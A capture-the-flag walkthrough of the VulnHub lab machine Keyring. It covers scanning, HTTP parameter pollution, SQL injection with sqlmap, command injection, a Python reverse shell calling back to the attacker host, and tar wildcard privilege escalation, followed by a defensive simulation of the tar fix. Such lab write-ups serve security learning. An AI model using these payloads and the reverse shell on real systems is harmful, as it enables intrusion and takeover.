Penetration practice: VulnHub machine Keyring
2022-07-01 17:39:00 【It's safe to go to school on Fubo road】
No.26 Keyring
Target information
Download: https://www.vulnhub.com/entry/ia-keyring-101,718/
Platform: VulnHub.com
Machine name: IA: Keyring (1.0.1)
Difficulty: Easy to Medium
Release date: 30 July 2021
Goal: 2 flags (user.txt and root.txt)
Lab environment
Attacker: Kali on VMware, 192.168.7.3
Target: Linux VM on VirtualBox, IP address assigned automatically (DHCP)
Information gathering
Host discovery
Find the target's IP address on the LAN with a ping sweep (-sP is the old spelling of -sn):
sudo nmap -sP 192.168.7.1/24
The target is found at 192.168.7.158
Port scan
Scan all TCP ports of the target with default scripts and version detection, saving the output:
sudo nmap -sC -sV -p- 192.168.7.158 -oN keyring.nmap
Two open ports are found: 22 (SSH) and 80 (HTTP)
Web penetration
Visit port 80:
http://192.168.7.158
The homepage opens on a registration form. Register an account, then log in (on the registration page, leave the username and password empty and click the Login button; it jumps to the login page, where you enter the account you just registered).
After logging in, control.php shows a hint: HPP, HTTP Parameter Pollution.
HTTP Parameter Pollution (HPP)
Brief introduction:
HTTP Parameter Pollution, abbreviated HPP, refers to how a web container handles an HTTP parameter that is supplied more than once in the same request.
HPP is a web attack evasion technique: by sending several instances of a parameter with the same name, an attacker can change how the server interprets the request, override a value, or reach hidden functionality. The evasion works by splitting the attack vector across the instances of the parameter. Some environments concatenate the values of all instances of the same name; others keep only the first or only the last.
Example:
The source of HttpPar.php is:
<?php
// echo back whatever was received for the str parameter
$str = $_REQUEST['str'];
echo $str;
?>
This code takes the HTTP parameter str and shows it on the page (echoing it unescaped is also a reflected XSS, but the point here is parameter handling). Visiting http://www.xxx.com/HttpPar.php?str=hello displays hello.
In an HTTP request, & joins different parameters, for example str=hello&id=1. If the same parameter is repeated, as in str=hello&str=world&str=xxser, PHP keeps only the last value, so the output is xxser. This is HTTP parameter pollution.
HPP can be combined with SQL injection and XSS, and is most often used to get around a WAF.
Put simply, for this box the HPP hint means there is a parameter we do not yet know, so first run a directory scan to look for more hints.
Directory scanning
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.7.158 -x php,html,txt
The scan finds history.php; visit it:
http://192.168.7.158/history.php
The page is blank, which suggests it expects a parameter. Visiting it again after logging out shows a prompt:
"user not found". Log in again and try user as the parameter name:
http://192.168.7.158/history.php?user=user1234
With my registered username some content is shown; change it to admin:
http://192.168.7.158/history.php?user=admin
This reveals a link: https://github.com/cyberbot75/keyring
The repository holds the site's source code. In control.php there is a call to PHP's system() function whose argument comes straight from the request, so try it:
http://192.168.7.158/control.php?cmdcntr=id
SQL injection
That did not work for the current account, and the source shows nothing else obvious. Going back to the HPP hint and the user parameter just found, try SQL injection on it (the session cookie is passed because history.php requires a logged-in user):
Enumerate databases:
sqlmap -u http://192.168.7.158/history.php?user=user1234 --cookie='PHPSESSID=0ce7psagp018qtd5gndrsdsl8o' --batch --dbs
Enumerate tables in the users database:
sqlmap -u http://192.168.7.158/history.php?user=user1234 --cookie='PHPSESSID=0ce7psagp018qtd5gndrsdsl8o' --batch -D users --tables
Dump the details table:
sqlmap -u http://192.168.7.158/history.php?user=user1234 --cookie='PHPSESSID=0ce7psagp018qtd5gndrsdsl8o' --batch -D users -T details --dump
The dump gives the administrator account admin with password myadmin#p4szw0r4d. Log in to the site as admin; control.php now honours the cmdcntr parameter, which only works for the admin account:
http://192.168.7.158/control.php?cmdcntr=id
The command executes. Now get a reverse shell back to the Kali attacker.
Listen on Kali:
nc -lvvp 4444
Execute the payload (when replaying this with a tool such as curl, the cmdcntr value must be URL-encoded):
http://192.168.7.158/control.php?cmdcntr=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.7.3",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
The reverse shell connects. Before looking for the flag, upgrade it to an interactive bash:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Privilege escalation
cat /etc/passwd
There is a john user, and the SQL injection dump also contained a john. Try whether the password is reused; it is, and the password for john is Sup3r$S3cr3t$PasSW0RD:
su john
Sup3r$S3cr3t$PasSW0RD
id
Switched to john successfully. id shows membership of the lxd group, which could also be used for privilege escalation, but first have a look at the home directory.
cd /home/john
ls -al
user.txt is here:
cat user.txt
There is also a compress program; check what it is:
file compress
It is a SUID binary. Serve it from the target over HTTP and download it to Kali to inspect it:
python3 -m http.server
On Kali, download compress and look at its strings:
wget http://192.168.7.158:8000/compress
strings compress
The strings show that compress runs tar over the directory with a wildcard, so tar wildcard injection can be used to escalate: the shell expands the wildcard into filenames, and GNU tar treats any filename that starts with - as an option, including --checkpoint and --checkpoint-action=exec=..., which runs a command as the SUID owner.
Payload (the files are created in the directory compress archives, so their names end up on tar's command line):
echo "/bin/bash" > exp.sh
echo "" > "--checkpoint-action=exec=sh exp.sh"
echo "" > --checkpoint=1
./compress
id
Root obtained. Read root.txt:
cd /root
ls
cat root.txt
With root.txt the box is done.
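The mechanism behind the escalation, as an added example that is not part of the original walkthrough or the compress binary: it plants the same three files in a scratch directory, expands the wildcard the way the shell would, and emulates GNU tar's argument handling (a token starting with - is an option wherever it appears, until a bare -- ends option parsing). It does not run tar and needs no root, which is why it can also show the two fixes: archiving ./* so every name begins with ./, or placing -- before the wildcard. The exact command inside compress is assumed to be of the form tar cf ... * as the strings output suggests.

```python
import os
import tempfile


def plant_files(workdir, cmd="sh exp.sh"):
    """Create the three files from the walkthrough inside workdir."""
    with open(os.path.join(workdir, "exp.sh"), "w") as f:
        f.write("/bin/bash\n")
    for name in ("--checkpoint=1", "--checkpoint-action=exec=" + cmd):
        open(os.path.join(workdir, name), "w").close()


def shell_expand(workdir, prefix=""):
    """What an unquoted glob becomes on the command line: '*' gives bare names,
    './*' gives names with a ./ prefix. Sorted by code point; a real shell sorts
    by locale, but both option-looking names still land on the command line."""
    names = sorted(n for n in os.listdir(workdir) if not n.startswith("."))
    return [prefix + n for n in names]


def tar_plan(args):
    """Emulates GNU tar's treatment of the expanded arguments: any token that
    starts with '-' is an option wherever it appears (GNU getopt permutes),
    until a bare '--' ends option parsing. Returns (members, command tar would
    run at the checkpoint or None)."""
    members, checkpoint, action, opts_done = [], None, None, False
    for tok in args:
        if not opts_done and tok == "--":
            opts_done = True
        elif not opts_done and tok.startswith("-") and tok != "-":
            if tok.startswith("--checkpoint="):
                checkpoint = tok[len("--checkpoint="):]
            elif tok.startswith("--checkpoint-action=exec="):
                action = tok[len("--checkpoint-action=exec="):]
        else:
            members.append(tok)
    return members, (action if checkpoint and action else None)


def simulate(prefix="", end_of_options=False):
    """Plant the files in a scratch directory and show what 'tar cf out.tar <glob>'
    would do for '*', './*' and '-- *'."""
    with tempfile.TemporaryDirectory() as d:
        plant_files(d)
        args = (["--"] if end_of_options else []) + shell_expand(d, prefix)
        return tar_plan(args)


if __name__ == "__main__":
    print("tar cf out.tar *    ->", simulate())                    # runs 'sh exp.sh'
    print("tar cf out.tar ./*  ->", simulate("./"))                # no command
    print("tar cf out.tar -- * ->", simulate(end_of_options=True)) # no command
```

The crafted names are archived as ordinary members in the two safe spellings, which is why the fix for a SUID wrapper like compress is to quote the path or use ./* or -- rather than to filter filenames.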